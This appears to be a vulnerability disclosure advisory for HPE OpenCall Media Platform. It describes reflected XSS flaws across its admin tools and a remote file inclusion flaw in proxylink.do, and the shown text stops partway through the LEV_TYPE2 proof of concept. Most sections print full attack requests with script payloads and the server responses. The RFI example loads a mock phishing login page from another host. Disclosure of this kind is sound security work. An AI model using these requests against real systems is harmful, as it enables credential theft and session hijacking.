SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities
Credit to Author: Maor Schwartz| Date: Mon, 24 Apr 2017 05:57:39 +0000
Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom
Vulnerabilities Summary
The following advisory describes Reflected Cross-Site Scripting (XSS) vulnerabilities and a Remote File Inclusion vulnerability that when combined can lead to arbitrary Javascript code execution, were found in HP OpenCall Media Platform (OCMP), version 4.3.2.
HPE OpenCall Media Platform (OCMP) is a suite of software and hardware applications which allow implementation of common telecom operator services such as voicemail, sms (short message service), prepaid, billing, hlr, etc. It implements industry standard telecom protocols and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.
HPE OpenCall Media Platform offers a highly scalable, easy-to-manage, carrier-grade media platform that adapts to future networks and applications. Through its strong support of open standards and protocols, new applications can be rapidly developed and deployed in a way that preserves investments and reduces capital expenditures (CAPEX) and operational expenditure (OPEX).
There are 3 different components that are vulnerable in HPE OpenCall Media Platform (OCMP), and for each component has the following vulnerabilities:
- Application Content Manager
- Reflected Cross-Site Scripting (XSS) – /mcm/resources/
- Platform Administration Tool
- Reflected Cross-Site Scripting (XSS) that leads to arbitrary Javascript code execution
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
- Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
- Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
- Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter
- VoiceXML Administration Tool
- Reflected Cross-Site Scripting (XSS) – event.do function
- Reflected Cross-Site Scripting (XSS) – call.do function
- Remote File Inclusion – proxylink.do function
Credit
An independent security researcher Paolo Stagno from VoidSec has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Responses
HPE has released patches to address this vulnerability, for more details see:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us
Vulnerabilities Details
Application Content Manager – /mcm/resources/
HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/ “description” and “prototype” parameters input. An attacker can inject malicious Javascript to trigger the Reflected Cross-Site Scripting (XSS).
Proof of Concept
An Attacker send the following POST request to the victims machine:
The server will respond with:
1 2 3 4 | HTTP/1.1 204 No Content X–Powered–By: Servlet 2.5; JBoss–5.0/JBossWeb–2.1 Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server |
Then the attacker will send the second request to trigger the Cross-Site Scripting (XSS):
1 2 3 4 5 6 7 8 9 10 | GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924 HTTP/1.1 Host: 127.0.0.1:8443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: */* Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 X–Requested–With: XMLHttpRequest Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html Connection: keep–alive |
The server will respond with:
1 2 3 4 5 6 7 8 9 10 11 | HTTP/1.1 200 OK X–Powered–By: Servlet 2.5; JBoss–5.0/JBossWeb–2.1 Cache–control: no–cache Content–Type: application/json Transfer–Encoding: chunked Date: Wed, 23 Sep 2015 16:13:35 GMT Server: Web Server da {“id”:“test”,“”:“”,“haschildren”:“false”,“description”:“<script>alert(1);</script>“,“condition_type”:“NONE”,“lastmodified”:1443024815131,“hascontent”:“true”,“contentType”:“text/plain”,“type”:“data”,“contentLength”:15} 0 |
VoiceXML Administration Tool – call.do function
HPE OpenCall Media Platform (OCMP) does not sanitize call.do function parameters input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /om/call.do?action=list_calls&type=Active637a3<script>alert(1)<%2fscript>c7e9f HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: https://127.0.0.1:5443/om/servicegroup.do?action=addservicegroup Accept–Language: en–GB User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept–Encoding: gzip, deflate Host: 127.0.0.1:5443 DNT: 1 Connection: Keep–Alive Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B |
The server will respond with:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 | HTTP/1.1 200 OK Server: Apache–Coyote/1.1 Pragma: No–cache Cache–Control: no–cache,no–store Expires: Thu, 01 Jan 1970 01:00:00 GMT Content–Type: text/html;charset=ISO–8859–1 Date: Thu, 10 Sep 2015 13:30:41 GMT Content–Length: 10418 <HTML> <HEAD> <TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE> <LINK REL=“stylesheet” HREF=“consolepages/templates/stylesheets/style.css” TYPE=“text/css”> </HEAD> <BODY> <script type=“text/javascript”> //HV Menu v5- by Ger Versluis (www.burmees.nl) //Submitted to Dynamic Drive (www.dynamicdrive.com) //Visit www.dynamicdrive.com for this script and more function Go(){return} </script> <script type=“text/javascript” src=“consolepages/templates/js/exmplmenu_var.jsp”></script> <script type=“text/javascript” src=“consolepages/templates/js/menu_com.js”></script> <noscript>Your browser does not support script</noscript> <TABLE WIDTH=“800” BORDER=“0”> <TR> <TD><IMG SRC=“consolepages/templates/images/speechweb.gif”/></TD> </TR> <TR> <TD VALIGN=“top”> Logged on as: zerpsta1 <SPAN id=“warn”> </SPAN> <BR><BR><BR><BR> <br> <b>Call Management -> Active637a3<script>alert(1)</script>c7e9f Calls</b> <br><br><br> <table border=“1” width=“1000”> <tr><td colspan=“12” class=“tableheader”>Calls <a href=“#”><img src=“consolepages/templates/images/questionmark.gif” border=“0” onClick=“window.open(‘help.do?prompt=p20’, ‘help’, ‘toolbar=no,width=400,height=400,resizable=no,scrollbars=yes’);”></a></td></tr> <tr><td colspan=“12”> </td></tr> <tr> <td><b><a href=call.do?action=sort_calls&type=node>Server Id</a></b></td> <td><b><a href=call.do?action=sort_calls&type=callid>CallId</a></b></td> <td><b>CDR</b></td> <td><b>Call Monitoring</b></td> <td><b>Service Id</b></td> <td><b><a href=call.do?action=sort_calls&type=ruri>Remote–URI</a></b></td> <td><b><a href=call.do?action=sort_calls&type=luri>Local–URI</a></b></td> <td><b><a href=call.do?action=sort_calls&type=severe>Severes</a></b></td> <td><b><a href=call.do?action=sort_calls&type=warning>Warnings</a></b></td> <td><b><a href=call.do?action=sort_calls&type=vxml_exception>VoiceXML Exceptions</a></b></td> <td><b><a href=call.do?action=sort_calls&type=time>Started At</a></b></td> <td><b>Duration</b></td> </tr> <tr bgcolor=“eeeeee”> <td>tb0ocmp1</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_32_634_3</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_32_634_3&node=tb0ocmp1”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470521123</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=vxml_exception target=“new”>21</a></td> <td>150909 19:00:52.429</td><td>00:00:00.502</td> </tr> <tr> <td>tb0ocmp0</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_40_420_2</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_40_420_2&node=tb0ocmp0”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470174023</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=vxml_exception target=“new”>21</a></td> <td>150908 19:29:05.236</td><td>00:00:00.501</td> </tr> <tr bgcolor=“eeeeee”> <td>tb0ocmp1</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_32_634_2</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_32_634_2&node=tb0ocmp1”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470852423</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=vxml_exception target=“new”>21</a></td> <td>150908 19:27:56.237</td><td>00:00:01.003</td> </tr> <tr> <td>tb0ocmp0</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_40_420_1</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_40_420_1&node=tb0ocmp0”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470632723</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=vxml_exception target=“new”>21</a></td> <td>150907 18:57:21.548</td><td>00:00:01.004</td> </tr> <tr bgcolor=“eeeeee”> <td>tb0ocmp1</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_32_634_1</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_32_634_1&node=tb0ocmp1”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470277023</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=vxml_exception target=“new”>21</a></td> <td>150907 15:13:19.660</td><td>00:00:01.003</td> </tr> <tr> <td>tb0ocmp0</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_40_420_0</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_40_420_0&node=tb0ocmp0”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_0xxx”>o2_ivr_0xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1542000470860823</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=ERROR target=“new”>1</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=vxml_exception target=“new”>21</a></td> <td>150907 15:12:15.254</td><td>00:00:00.501</td> </tr> <tr bgcolor=“eeeeee”> <td>tb0ocmp0</td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html” target=“_new”>vxi_dialog_0_32_634_0</a></td> <td><a href=“proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13” target=“_new”>CDR</a></td> <td><a href=“call.do?action=monitor&cid=vxi_dialog_0_32_634_0&node=tb0ocmp0”>Monitor</a></td> <td><a href=“service.do?action=update&id=o2_ivr_3xxx”>o2_ivr_3xxx</a></td> <td>sip:unavailable@unknown.invalid</td> <td>+1540003000009388</td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=ERROR target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=WARN target=“new”>0</a></td> <td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=vxml_exception target=“new”>0</a></td> <td>150907 15:00:13.901</td><td>00:00:45.194</td> </tr> </table> </TD> </TR> </TABLE> </BODY> </HTML> |
VoiceXML Administration Tool – event.do function
HPE OpenCall Media Platform (OCMP) does not sanitize event.do function parameters input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/event.do?action=list&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /om/event.do?action=list&type=Active637a3<script>alert(1)<%2fscript>c7e9f HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: https://172.27.116.32:5443/om/call.do?action=trace_calls&type=trace_calls Accept–Language: en–GB User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept–Encoding: gzip, deflate Host: 172.27.116.32:5443 DNT: 1 Connection: Keep–Alive Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B |
The server will respond with:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 | HTTP/1.1 200 OK Server: Apache–Coyote/1.1 Pragma: No–cache Cache–Control: no–cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Content–Type: text/html;charset=ISO–8859–1 Content–Length: 2437 Date: Thu, 10 Sep 2015 13:32:55 GMT <HTML> <HEAD> <TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE> <LINK REL=“stylesheet” HREF=“consolepages/templates/stylesheets/style.css” TYPE=“text/css”> </HEAD> <BODY> <script type=“text/javascript”> //HV Menu v5- by Ger Versluis (www.burmees.nl) //Submitted to Dynamic Drive (www.dynamicdrive.com) //Visit www.dynamicdrive.com for this script and more function Go(){return} </script> <script type=“text/javascript” src=“consolepages/templates/js/exmplmenu_var.jsp”></script> <script type=“text/javascript” src=“consolepages/templates/js/menu_com.js”></script> <noscript>Your browser does not support script</noscript> <TABLE WIDTH=“800” BORDER=“0”> <TR> <TD><IMG SRC=“consolepages/templates/images/speechweb.gif”/></TD> </TR> <TR> <TD VALIGN=“top”> Logged on as: zerpsta1 <SPAN id=“warn”> </SPAN> <BR><BR><BR><BR> <script language=“JavaScript”> function toggleVisibility( divId, buttonId ) { if( document.all[divId].style.display == ‘none’ ) { document.all[divId].style.display = ‘inline’; document.all[buttonId].value = ‘Hide Stacktrace’; } else { document.all[divId].style.display = ‘none’; document.all[buttonId].value = ‘Show Stacktrace’; } } </script> <br> <b>Active637a3<script>alert(1)</script>c7e9f</b> <br><br> <form action=“event.do”> <input type=“submit” value=“Reset” name=“submit” onClick=“return confirm(‘Are you sure you want to remove all Active637a3<script>alert(1)</script>c7e9f?’)”> <input type=“hidden” name=“action” value=reset > <input type=“hidden” name=“type” value=“Active637a3<script>alert(1)</script>c7e9f”> </form> <br><br> <table border=“1” width=“1200”> <tr><td colspan=“8” class=“tableheader”>Events <a href=“#”><img src=“consolepages/templates/images/questionmark.gif” border=“0” onClick=“window.open(‘help.do?prompt=p21’, ‘help’, ‘toolbar=no,width=400,height=400,resizable=no,scrollbars=yes’);”></a></td></tr> <tr><td colspan=“8”> </td></tr> <tr> <td><b><a href=event.do?action=sort&type=NODE >Server Id</a></b></td> <td><b><a href=event.do?action=sort&type=TIME >Date</a></b></td> <td><b><a href=event.do?action=sort&type=CALL >CallId</a></b></td> <td><b>CDR</b></td> <td><b>Service Id</b></td> <td><b>Message</b></td> </tr> <tr><td colspan=“8”> </td></tr> <tr><td colspan=“8”>No Items Found</td></tr> </TD> </TR> </TABLE> </BODY> </HTML> |
VoiceXML Administration Tool – proxylink.do function
HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do function parameters input. An attacker can inject malicious URL to including remote files. After the attacker include the file, the HPE OpenCall Media Platform will parse and execute the content of the file.
The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI)
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 | GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept–Language: en–GB User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Accept–Encoding: gzip, deflate Host: 172.27.116.32:5443 DNT: 1 Connection: Keep–Alive Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA |
The server will respond with:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 | HTTP/1.1 200 OK Server: Apache–Coyote/1.1 Pragma: No–cache Cache–Control: no–cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Content–Type: text/html;charset=ISO–8859–1 Content–Length: 2565 Date: Wed, 09 Sep 2015 13:00:53 GMT <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”> <html> <head> <title>PHISHING LOGIN PAGE</title> <meta http–equiv=“Content-Type” content=“text/html; charset=US-ASCII”> <link rel=“Shortcut Icon” href=“/login/images/hp.ico”> <script> function onLoginFornLoad() { document.getElementById(“txtUsername”).focus(); } </script> <style type=”text/css”> .style1 { width: 290px; } .style2 { width: 285px; } </style> </head> <body onload=“onLoginFornLoad()”> <h2>PHISHING LOGIN PAGE</h2> <script>document.write(“I`m also running JS”);</script> <form action=“j_security_check” method=“POST”> <table cellpadding=“0” cellspacing=“0” width=“100%” height=“100%” style=“background-color: #ffffff”> <tr> <td align=“center” valign=“middle”> <table cellpadding=“0” cellspacing=“0” height=“309” style=“border: 1px solid #000000; background-position: left top; background-image:url(‘/login/images/hp_logo.png’); background-repeat: no-repeat; width: 576px; clip: rect(1px, auto, auto, auto);” > <tr> <td class=“style2”> </td> <td class=“style1”> <table cellpadding=“0” cellspacing=“0”> <tr> <td width=“60” style=“font-family: Arial, Helvetica, sans-serif; color: #000000; font-weight: bold”> User Name </td> <td><input name=“j_username” type=“text” size=“14” style=“width: 193px;” id=“txtUsername” value=“”></td> </tr> <tr><td colspan=“2” height=“3”></td></tr> <tr> <td style=“font-family: Arial, Helvetica, sans-serif; font-weight: bold”>Password </td> <td><input name=“j_password” type=“password” size=“14” style=“width: 191px”></td> </tr> <tr><td colspan=“2” height=“3”></td></tr> <tr><td colspan=“2”> </td></tr> <td colspan=“2” align=“right”> <button type=“submit” value=“Log in” style=“width:54px; margin-top:8px”>Login</button> </td> </tr> </table> </td> <td style=“background-color: #FFFFFF”> </td> </tr> </table> </td> </tr> </table> </form> </body> </html> |
Platform Administration Tool – Reflected Cross-Site Scripting (XSS) that lead to arbitrary Javascript code execution
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can inject malicious javascript to trigger the Cross-Site Scripting (XSS).
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3<script>alert(1)<%2fscript>1d8b4&sessionType=NONE HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFMonitorMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_TYPE0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_TYPE0 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985″><script>alert(1)< %2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985“><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_TYPE1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_TYPE1 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a”><script>alert(1)< %2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
1 2 3 4 5 6 7 8 9 10 | GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a“><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3 HTTP/1.1 Host: 172.27.116.40:4443 User–Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept–Language: en–US,en;q=0.5 Accept–Encoding: gzip, deflate DNT: 1 Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC Connection: keep–alive |
Platform Administration Tool – LEV_TYPE2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction function parameter LEV_TYPE2 input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2″><script>alert(1)< %2fscript>54f45&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
